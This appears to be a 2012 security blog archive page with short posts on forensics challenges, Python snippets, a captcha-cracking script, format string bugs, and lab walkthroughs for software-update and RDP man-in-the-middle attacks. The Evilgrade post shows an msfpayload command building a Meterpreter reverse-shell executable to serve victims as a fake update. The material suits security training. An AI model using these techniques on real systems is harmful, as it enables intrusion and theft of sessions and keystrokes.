Posts

Showing posts from 2012

Forensic Challenger

This is my forensic challenger: For 1: Find password in:  for1(2).zip For 2: Analysis network capture and find password: google.pcap For 3: Analysis windows memory and find password of backdoor: winxp_memory.img ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- Security Research All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Easy read capcha with Python

I need crack some easy captcha, so i written one script to do that. I used PIL lib to edit images, convert background to whitem character to black. And Pytesster used to make OCR: Optical Character Recognition. from PIL import Image img = Image.open('a.jpeg') # Your image here! img = img.convert("RGBA") width, height = img.size pixdata = img.load() # Make the letters bolder for easier recognition for y in xrange(img.size[1]):     for x in xrange(img.size[0]):         if pixdata[x, y][0] < 90:             pixdata[x, y] = (0, 0, 0, 255) for y in xrange(img.size[1]):     for x in xrange(img.size[0]):         if pixdata[x, y][1] < 136:             pixdata[x, y] = (0, 0, 0, 255) for y in xrange(img.size[1]):     for x in xrange(img.size[0]):         if pixdata[x, y][2] > 0:             pixdata[x, y] = (255, 255, 255, 255) img.save("input-black.gif", "GIF") #   Make the image bigger (needed for OCR) im_orig = Image.

SQLite3 class in Python

For my working, i created class using sqlite3 to manipluate database: #!/usr/bin/python import sqlite3, sys class database:     'Database sqlite3 class'     def __init__(self, name):         self.name = name         self.create_database()     def create_database(self):         self.conn = sqlite3.connect(self.name)         self.c = self.conn.cursor()     def query(self, query):         try:               r = self.c.execute(query)             self.conn.commit()             return r         except sqlite3.Error, e:             print "Error %s:" % e.args[0]             sys.exit(1)     def query2(self, query):         try:               self.c.execute(query)             r = self.c.fetchall()             return r         except sqlite3.Error, e:             print "Error %s:" % e.args[0]             sys.exit(1)     def check_database_exits(self,table_name):         re = self.query2("SELECT name FROM sqlite_master WHERE type='

Python - Multithread to read one file

Today, i am working with python. I need write script to read one file, and get line by line, per line deliver one thread process ( total 10 threads). I want solution, so i chose working with thread and queue. In python, when procsess initializate, this process will be assigned with queue, and working with this queue. We will put data ( in this case is line) to queue. Process will read from queue, so, all processes can read one file, not overlap :D import threading import Queue #Number of threads n_thread = 5 #Create queue queue = Queue.Queue() class ThreadClass(threading.Thread):     def __init__(self, queue):         threading.Thread.__init__(self)     #Assign thread working with queue         self.queue = queue     def run(self):         while True:         #Get from queue job             host = self.queue.get()             print self.getName() + ":" + host         #signals to queue job is done             self.queue.task_done() #Create number proce

Format String Attacks to maniplulate information anywhere in memory

By manipulating programs that misuse the printf and related command, an attacker can Read arbitrary information from memory. And, maniplulate information anywhere in memory. So, an attacker can have complete control over victim process The right way: printf("%s",buffer); The wrong way: printf(buffer); If program is implemented in "wrong" way, an attacker can place input into the string that will be interpreted as a string format So, an attacker can print memory, stack. In easy way to understand that main() {     char user_input[100];     char buffer[100];     int x = 1;     ....     /* get user input*/     ...     snprintf(buffer, sizeof buffer, user_input); <==== Oh, forgot the format string, the user input will be interpreted as the format   } Attacker enter "%x %x %x" into user_input, becomes: snprintf(buffer, sizeof buffer, "%x %x %x");. And buffer now contains the next three hexadecimal value on the strack, so, we can rea

MySQLDumper Exploit

Image
------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- Security Research All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Sqlmap plugin for BurpSuite

Image
Download SQLmap plugin for Brupsuite at: http://code.google.com/p/gason/downloads/list 1 - Store it in the same folder brupsuite 2 - Use this command to start brupsuite with plugin: ( on Linux) java -classpath gason-0.9.5.:"burpsuite_v1.4.01.jar" burp.StartBurp 3 - On start, when you click proxy tab/ action, you will see send to sqlmap Config web browser use brupsuite proxy. Now, you can use it 1 - Request from browser to brupsuite 2 - Action/ Send to SQLmap On SQLmap option, you must: 1 - Config SQLmap bin path 2 - Action 3 - Option if you need, then run And this is result: ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- Security Research All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Software Update MITM Exploit use Evilgrage and Ettercap

Image
Many software check for updates, sometime updates are preformed over SSL. Commonly, updates are delivered over HTTP, which can be manipulated Modular exploit tool to spoof Software Update Responses, to delivers executable of your choosing to the victim. In this lab, i used Evilgrade with Ettercap Your victim machine use Notepad++ unstable: 1 - Unstable version 2 - Victim IP and DNS Install Evilgrade on Backtrack system: 1 - # cd /root 2 - # apt-get install libdata-dump-perl 3 - # wget http://isr-evilgrade.googlecode.com/files/isr-evilgrade-2.0.0.tar.gz 4 - # tar xfz isr-evilgrade-2.0.0.tar.gz 5 - # cd isr-evilgrade Prepare Metepreter executable to deliver to victim 1 - # ifconfig eth0 Get your Backtrack IP address 2 - # cd /root/isr-evilgrade/agent/ Go to evilgrade agent directory 3 - # /opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.174.132 LPORT=8080 X > agent.exe Create metepreter executable 4 - # ls Verify agent.exe 1 -

RDP Man in The Middle

Image
Remote Desktop Protocol ( RDP) is used in most Windows environments. It often vulnerable to man-in-the-middle. You can decrypt session to reveal keystrokes. Today, we will demo this. Note: Newer RDP version can employ a certificate and TLS encryption, but self-signed certs are often used. And Cain is only tool we know of that can attack RDP ( even with TLS) We need three systems for yourself: •    RDP server •    RDP client ( victim) •    Attacker ( running Cain on Windows XP) Note: •    No security suite ( disable firewall) •    Note IP address of each •    Install Cain & Abel, and accept all default except WinPcap 1.    On RDP Server system, create an admin user account: 1 - Create an administrator account 2 – Then add it into Administrators groups 3 – Verify its creation 2.    Enable RDP on RDP server system: 1 - Right click My Computer 2 - Chose Properties 3 – Chose Remote tab 4 – Check “ Allow user to connect remotely to this compute”. Click ok on Confirm

Install Backtrack 5 Login GUI

I like Backtrack Gnome GUI, but i don`t like login screen of this. So, i installed login GUI for Backtrack: Install gdm: apt-get install gdm Add gdm to startup: Edit file  /etc/rc.local Add: /usr/sbin/gdm & ( before line: exit 0 ) Reboot now. If you want auto startx: http://kendyhikaru.blogspot.com/2012/04/backtrack-trick.html ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- Security Research All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Install Backtrack5 R3

Image
Entry for my friend, install Backtrack5 R3. First, you need create USB boot. I used Yumi:  Install Backtrack with your USB:   ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- Security Research All my Lab: Linux Lab -- Window and Networking Lab to be continued - I will update more.